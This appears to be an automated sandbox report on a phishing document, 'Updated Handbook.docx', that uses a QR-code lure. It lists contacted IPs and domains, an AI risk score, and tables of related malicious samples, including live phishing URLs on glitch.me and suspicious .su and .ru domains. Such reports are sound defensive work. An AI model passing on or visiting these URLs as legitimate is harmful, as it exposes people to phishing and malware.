                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://m.media-amazon.com/images/S/sash/kfKKBuoqcD$AUKL.woff)chromecache_476.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://m.media-amazon.com/images/S/sash/e0LnMbFWJC-TMQz.woff)chromecache_476.8.drfalse
                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    52.19.51.33
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    18.239.16.170
                                                                                                                                                                                                                    djvbdz1obemzo.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    34.160.236.64
                                                                                                                                                                                                                    tagr-pixel-nginx-odr-euw4.mookie1.comUnited States
                                                                                                                                                                                                                    2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                    13.33.119.57
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    77.243.51.121
                                                                                                                                                                                                                    uip.semasio.netDenmark
                                                                                                                                                                                                                    42697NETIC-ASDKfalse
                                                                                                                                                                                                                    13.249.29.113
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    18.239.63.150
                                                                                                                                                                                                                    d1nruqhae353qc.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    65.9.66.12
                                                                                                                                                                                                                    d2u28gf9o4d1cv.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    44.215.130.62
                                                                                                                                                                                                                    unagi-na.amazon.comUnited States
                                                                                                                                                                                                                    14618AMAZON-AESUSfalse
                                                                                                                                                                                                                    35.190.80.1
                                                                                                                                                                                                                    a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    108.128.42.32
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    157.240.0.35
                                                                                                                                                                                                                    star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                                    32934FACEBOOKUSfalse
                                                                                                                                                                                                                    18.239.85.223
                                                                                                                                                                                                                    c.media-amazon.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    18.193.192.41
                                                                                                                                                                                                                    adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    3.253.166.191
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                                                    67.220.224.105
                                                                                                                                                                                                                    unagi-eu.amazon.comUnited States
                                                                                                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                                                                                                    13.249.29.123
                                                                                                                                                                                                                    a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    18.239.83.75
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.46.143.56
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.78.254.47
                                                                                                                                                                                                                    load-euw1.exelator.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    216.58.206.36
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    104.21.62.220
                                                                                                                                                                                                                    nkoc4.ancolabi.suUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    151.101.65.16
                                                                                                                                                                                                                    media.amazon.map.fastly.netUnited States
                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                    18.239.36.21
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    87.248.119.252
                                                                                                                                                                                                                    edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                    203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                    35.186.196.148
                                                                                                                                                                                                                    sync.rfp.fout.jpUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    108.156.69.18
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    164.132.25.185
                                                                                                                                                                                                                    rtb-csync-euw2.smartadserver.comFrance
                                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                                    52.95.121.232
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.95.126.138
                                                                                                                                                                                                                    aax-eu.amazon-adsystem.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    3.253.177.216
                                                                                                                                                                                                                    completion.amazon.co.ukUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    185.64.190.78
                                                                                                                                                                                                                    pugm-lhrc.pubmnet.comUnited Kingdom
                                                                                                                                                                                                                    62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                    54.154.136.52
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.95.119.2
                                                                                                                                                                                                                    aax-eu-retail-direct.amazon-adsystem.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.216.117.185
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.213.182.240
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    188.114.96.3
                                                                                                                                                                                                                    specialpoint.netEuropean Union
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    35.156.61.253
                                                                                                                                                                                                                    match-eu-central-1-ecs.sharethrough.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    209.54.182.161
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    21719CHLUSfalse
                                                                                                                                                                                                                    67.220.228.97
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                                                                                                    52.210.15.1
                                                                                                                                                                                                                    usersync.gumgum.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.212.43.135
                                                                                                                                                                                                                    endpoint.prod.eu-west-1.forester.a2z.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    151.101.193.16
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                    151.101.1.16
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                    13.33.119.133
                                                                                                                                                                                                                    a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.46.128.147
                                                                                                                                                                                                                    s.amazon-adsystem.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.154.6.193
                                                                                                                                                                                                                    sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.194.230.131
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    151.101.129.16
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    54113FASTLYUSfalse
                                                                                                                                                                                                                    52.94.223.167
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    44.226.105.248
                                                                                                                                                                                                                    edger-edger-ra7qmuyuwxzs-482101627.us-west-2.elb.amazonaws.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.36.150.186
                                                                                                                                                                                                                    lb.mediarithmics.comFrance
                                                                                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                                                                                    188.65.124.66
                                                                                                                                                                                                                    public-prod-dspcookiematching.dmxleo.comFrance
                                                                                                                                                                                                                    41690DAILYMOTIONForpeeringrelatedbusinesspleasemailpeerinfalse
                                                                                                                                                                                                                    64.34.23.183
                                                                                                                                                                                                                    web4.iemsi.comCanada
                                                                                                                                                                                                                    13768COGECO-PEER1CAfalse
                                                                                                                                                                                                                    67.220.224.144
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                                                                                                    67.220.226.171
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                                                                                                    108.157.244.180
                                                                                                                                                                                                                    abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    207.211.31.113
                                                                                                                                                                                                                    url.us.m.mimecastprotect.comUnited States
                                                                                                                                                                                                                    14135NAVISITE-EAST-2USfalse
                                                                                                                                                                                                                    34.250.191.11
                                                                                                                                                                                                                    dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    104.18.36.155
                                                                                                                                                                                                                    ssum-sec.casalemedia.comUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    52.49.51.176
                                                                                                                                                                                                                    euw-ice.360yield.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    188.114.97.3
                                                                                                                                                                                                                    iic.jaishict.ruEuropean Union
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    35.186.194.101
                                                                                                                                                                                                                    sync.sxp.smartclip.netUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    65.9.66.49
                                                                                                                                                                                                                    static.siege-amazon.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    54.194.232.113
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.94.218.5
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    18.239.15.221
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    185.64.191.210
                                                                                                                                                                                                                    pug-lhr-bc.pubmnet.comUnited Kingdom
                                                                                                                                                                                                                    62713AS-PUBMATICUSfalse
                                                                                                                                                                                                                    34.247.205.196
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    172.64.151.101
                                                                                                                                                                                                                    dsum-sec.casalemedia.comUnited States
                                                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    18.239.24.188
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    35.214.149.91
                                                                                                                                                                                                                    user-data-eu.bidswitch.netUnited States
                                                                                                                                                                                                                    19527GOOGLE-2USfalse
                                                                                                                                                                                                                    34.1.224.11
                                                                                                                                                                                                                    envoy-hl.envoy-csync1.core-b8mf.ov1o.comUnited States
                                                                                                                                                                                                                    2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                    18.239.63.14
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    89.149.193.121
                                                                                                                                                                                                                    rtb-csync-euw1.smartadserver.comNetherlands
                                                                                                                                                                                                                    60781LEASEWEB-NL-AMS-01NetherlandsNLfalse
                                                                                                                                                                                                                    108.157.244.167
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.123.243.83
                                                                                                                                                                                                                    svc.ms-acdc-teams.office.comUnited States
                                                                                                                                                                                                                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                    76.223.111.18
                                                                                                                                                                                                                    eu-eb2.3lift.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.28.91.150
                                                                                                                                                                                                                    adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    52.95.122.73
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    13.32.118.131
                                                                                                                                                                                                                    d2h8zr0m6mus4x.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    142.250.185.132
                                                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    52.222.236.81
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    3.126.77.184
                                                                                                                                                                                                                    crb.kargo.comUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    67.220.226.233
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    18450WEBNXUSfalse
                                                                                                                                                                                                                    185.89.210.90
                                                                                                                                                                                                                    ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                    29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                    52.222.236.76
                                                                                                                                                                                                                    dlsq0ztllwnya.cloudfront.netUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    142.250.185.130
                                                                                                                                                                                                                    cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    34.98.64.218
                                                                                                                                                                                                                    us-u.openx.netUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    50.57.31.206
                                                                                                                                                                                                                    uipus.semasio.netUnited States
                                                                                                                                                                                                                    19994RACKSPACEUSfalse
                                                                                                                                                                                                                    18.239.36.71
                                                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                                                    16509AMAZON-02USfalse
                                                                                                                                                                                                                    35.190.24.218
                                                                                                                                                                                                                    rd.frontend.weborama.frUnited States
                                                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                    192.168.2.23
                                                                                                                                                                                                                    192.168.2.7
                                                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                    Analysis ID:1491594
                                                                                                                                                                                                                    Start date and time:2024-08-12 15:21:33 +02:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 8m 54s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:Updated Handbook.docx
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal48.winDOCX@29/1785@269/96
                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .docx
                                                                                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                                                                                    • Scroll down
                                                                                                                                                                                                                    • Close Viewer
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/ref=nav_logo
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_lang
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex&openid.mode=checkid_setup&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/gp/css/order-history?ref_=nav_orders_first
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cart
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/fmc/learn-more?ref_=nav_cs_groceries
                                                                                                                                                                                                                    • Browse: https://www.amazon.ae/gp/bestsellers?ref_=nav_cs_bestsellers
                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 46.228.146.0, 192.229.221.95, 52.111.231.26, 52.111.231.24, 52.111.231.25, 52.111.231.23, 13.89.179.8, 95.101.111.168, 95.101.111.179, 52.109.76.243, 88.221.110.138, 88.221.110.227, 142.250.185.99, 142.250.185.206, 66.102.1.84, 34.104.35.123, 104.18.10.14, 104.18.11.14, 172.217.16.138, 216.58.206.42, 142.250.186.74, 142.250.74.202, 172.217.18.106, 142.250.186.106, 216.58.212.170, 142.250.185.74, 172.217.18.10, 142.250.185.202, 216.58.206.74, 142.250.185.138, 142.250.185.234, 172.217.23.106, 172.217.16.202, 142.250.186.42, 2.16.238.142, 2.16.238.137, 2.19.126.163, 142.250.186.131, 104.18.7.198, 104.18.6.198, 2.23.197.190, 154.57.158.115, 154.54.250.81, 69.173.144.138, 69.173.144.165, 69.173.144.139, 37.157.6.243, 37.157.6.231, 37.157.6.237, 37.157.6.232, 37.157.6.233, 37.157.6.254, 142.250.181.234, 142.250.184.234, 172.217.23.110, 2.19.225.144, 154.54.250.80, 154.57.158.116
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): tags.bluekai.com.edgekey.net, uipglob.trafficmanager.net, www.amazon.de.edgekey.net, slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, e9126.x.akamaiedge.net, clients2.google.com, ocsp.digicert.com, lm-fr.eyeblaster.akadns.net, login.live.com, e16604.g.akamaiedge.net, ads.stickyadstv.com.edgesuite.net, update.googleapis.com, officeclient.microsoft.com, rtb-csync-geo.usersync-prod-sas.akadns.net, ecs.office.com, fs.microsoft.com, content-autofill.googleapis.com, prod.roaming1.live.com.akadns.net, cidr1.ads.stickyadstv.com.akadns.net, nleditor.osi.office.net, edgedl.me.gvt1.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, europe.configsvc1.live.com.akadns.net, mira.config.skype.com, www.amazon.ae.edgekey.net, binaries.templates.cdn.office.net.edgesuite.net, pixel.rubiconproject.net.akadns.net, l
                                                                                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • VT rate limit hit for: Updated Handbook.docx
                                                                                                                                                                                                                    No simulations
                                                                                                                                                                                                                    SourceURL
                                                                                                                                                                                                                    Screenshothttps://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
                                                                                                                                                                                                                    Screenshothttps://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
                                                                                                                                                                                                                    Screenshothttps://redirect.aecdaily.com/s1/url.us.m.mimecastprotect.com/s/M5BmCkRO7zHg7kGZf23i6C?domain=d2e4wd34e3e
                                                                                                                                                                                                                    InputOutput
                                                                                                                                                                                                                    URL: Office document Model: gpt-4o
                                                                                                                                                                                                                    ```json
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                      "riskscore": 7,
                                                                                                                                                                                                                      "reasons": "The document contains a visually prominent QR code, which can be a vector for phishing or malware if scanned. The text creates a sense of urgency by stating that all employees are required to scan the QR code to review the updated employee handbook and guidelines. This could mislead users into scanning the QR code without verifying its authenticity. Additionally, the document impersonates a company named 'Solutionz', which may or may not be a well-known brand, adding to the potential risk."
                                                                                                                                                                                                                    }
                                                                                                                                                                                                                    URL: https://www.amazon.ae/ref=nav_logo Model: jbxai
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                    "result":false,
                                                                                                                                                                                                                    "interest_score":"0.001"}
                                                                                                                                                                                                                    URL: https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_lang Model: jbxai
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                    "result":false,
                                                                                                                                                                                                                    "interest_score":"0.011"}
                                                                                                                                                                                                                    URL: https://www.amazon.ae/ap/signin?openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.ae%2F%3F_encoding%3DUTF8%26ref_%3Dnav_ya_signin&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.assoc_handle=aeflex& Model: jbxai
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                    "error":"[Errno 111] Connection refused"}
                                                                                                                                                                                                                    URL: https://www.amazon.ae/gp/cart/view.html?ref_=nav_top_cart Model: jbxai
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                    "result":false,
                                                                                                                                                                                                                    "interest_score":"0.069"}
                                                                                                                                                                                                                    URL: https://www.amazon.ae/gp/bestsellers?ref_=nav_cs_bestsellers Model: jbxai
                                                                                                                                                                                                                    {
                                                                                                                                                                                                                    "result":false,
                                                                                                                                                                                                                    "interest_score":"0.014"}
                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    34.160.236.64hashtab-6.0.0.34-installer_rxb9-U1.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                                      CourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        PIay__Now__Hi Goodmorning!#8256238189.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                          https://futuristic-gem-wood.glitch.me/public/sm5cde.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                            https://tarry-foggy-contraption.glitch.me/public/sm5cde.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                              https://phase-enthusiastic-wallaby.glitch.me/public/RRENFCONL0.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                PIay__Now__Hi Goodmorning!#7202221511.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  https://petalite-crocus-mitten.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                    http://5uxfno.esgrfmu.dns-dynamic.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      https://forms.office.com/e/c7HLGpx1PyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        77.243.51.121https://multievmosdapp.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          CourtOrder.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            https://sassy-magnificent-antimatter.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                              https://futuristic-gem-wood.glitch.me/public/sm5cde.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                https://tarry-foggy-contraption.glitch.me/public/sm5cde.HTMGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                  PIay__Now__Hi Goodmorning!#7202221511.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                    https://petalite-crocus-mitten.glitch.me/public/nfcu703553.HTMLGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                      https://www.globalepic.co.kr/view.php?ud=202408011057515744edd3030223_29Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        https://forms.office.com/e/c7HLGpx1PyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                          https://njd.pages.dev/account/js-reporting/?crumb=uz4.07kerli&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                            18.239.16.170https://0x7gg.bjhxof.ru/0x7gG/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                              https://www.purchasephone.shop/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                svc.ms-acdc-teams.office.comColruyt Group - Contact Information Form.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.70
                                                                                                                                                                                                                                                                [SUSPICIOUS ATTACHMENT] Fwd_ Status Update_ Download Statement.emlGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                                                                • 52.123.243.221
                                                                                                                                                                                                                                                                Ewhite Replay VM .docxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                                                • 52.123.243.77
                                                                                                                                                                                                                                                                LisectAVT_2403002C_69.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.85
                                                                                                                                                                                                                                                                Gw47LwivS6.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.193
                                                                                                                                                                                                                                                                rNuevalistadepedidos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                • 52.123.224.67
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                • 52.123.243.66
                                                                                                                                                                                                                                                                Informational-severity alert_ Creation of forwarding_redirect rule Case ID_FqJxoz8.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.193
                                                                                                                                                                                                                                                                Ref-#47882327.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                • 52.123.243.193
                                                                                                                                                                                                                                                                Techno_PO LV12406-00311.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                • 52.123.243.75
